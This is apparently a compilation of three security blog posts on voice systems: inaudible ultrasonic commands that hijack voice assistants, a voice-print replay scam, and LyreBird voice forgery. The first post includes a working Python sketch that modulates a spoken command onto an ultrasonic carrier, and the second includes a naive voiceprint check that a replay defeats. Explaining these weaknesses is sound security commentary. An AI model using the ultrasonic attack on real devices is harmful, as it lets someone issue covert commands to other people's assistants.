Hacking Voice Assistant Systems with Inaudible Voice Commands

Turns out that all the major voice assistants -- Siri, Google Now, Samsung S Voice, Huawei HiVoice, Cortana and Alexa -- listen at audio frequencies the human ear can't hear. Hackers can hijack those systems with inaudible commands that their owners can't hear.
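The research behind this works by amplitude-modulating an ordinary voice command onto an ultrasonic carrier above 20 kHz; the nonlinearity of the microphone hardware then demodulates it back down to baseband, so the assistant hears a command its owner never does. Here is a minimal sketch of the modulation step in Python (the filename, carrier frequency, and modulation depth are illustrative, and actually reproducing a 25 kHz carrier requires a speaker and sound card rated for it):

    import numpy as np
    from scipy.io import wavfile
    from scipy.signal import resample

    FS_OUT = 96_000       # output sample rate; must exceed twice the carrier
    F_CARRIER = 25_000.0  # ultrasonic carrier, above the range of human hearing

    # Load a recorded voice command (hypothetical filename).
    fs_in, voice = wavfile.read("command.wav")
    if voice.ndim > 1:
        voice = voice.mean(axis=1)            # mix down to mono
    voice = voice / np.max(np.abs(voice))     # normalise to [-1, 1]

    # Bring the baseband command up to the output sample rate.
    voice = resample(voice, int(len(voice) * FS_OUT / fs_in))

    # Standard amplitude modulation: carrier plus sidebands. The microphone's
    # own nonlinearity acts as the demodulator that recovers the command.
    t = np.arange(len(voice)) / FS_OUT
    modulated = (1 + 0.8 * voice) * np.cos(2 * np.pi * F_CARRIER * t)
    modulated /= np.max(np.abs(modulated))

    wavfile.write("inaudible.wav", FS_OUT, (modulated * 32767).astype(np.int16))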

News articles.

from https://www.schneier.com/blog/

Stealing Voice Prints

This article feels like hyperbole:

The scam has arrived in Australia after being used in the United States and Britain. The scammer may ask several times "can you hear me?", to which people would usually reply "yes." The scammer is then believed to record the "yes" response and end the call. That recording of the victim's voice can then be used to authorise payments or charges in the victim's name through voice recognition.

Are there really banking systems that use voice recognition of the word "yes" to authenticate? I have never heard of that.
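If such a system did exist and did nothing more than match the caller's voice features against an enrolled sample, a replayed recording would defeat it by construction: the replay is, feature for feature, the victim's own voice. A minimal sketch of that kind of naive check (the filenames, feature choice, and threshold are made up for illustration; real speaker-verification products layer liveness detection and anti-replay measures on top):

    import numpy as np
    import librosa

    def voiceprint(path):
        # Collapse MFCC frames into one fixed-length "voice print" vector.
        y, sr = librosa.load(path, sr=16000)
        mfcc = librosa.feature.mfcc(y=y, sr=sr, n_mfcc=20)
        return mfcc.mean(axis=1)

    def matches(enrolled_wav, attempt_wav, threshold=0.95):
        # Cosine similarity between the enrolled print and the attempt.
        a, b = voiceprint(enrolled_wav), voiceprint(attempt_wav)
        return np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)) >= threshold

    # A recording of the victim's actual "yes" sails through this check.
    print(matches("enrolled_yes.wav", "replayed_yes.wav"))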

from https://www.schneier.com/blog/

Forging Voice

LyreBird is a system that can accurately reproduce someone's voice, given a large number of sample recordings. It's pretty good -- listen to the demo here -- and will only get better over time.

The applications for recorded-voice forgeries are obvious, but I think the larger security risk will be real-time forgery. Imagine the social engineering implications of an attacker on the telephone being able to impersonate someone the victim knows.

I don't think we're ready for this. We use people's voices to authenticate them all the time, in all sorts of different ways.

EDITED TO ADD (5/11): This is from 2003 on the topic.

from https://www.schneier.com/blog/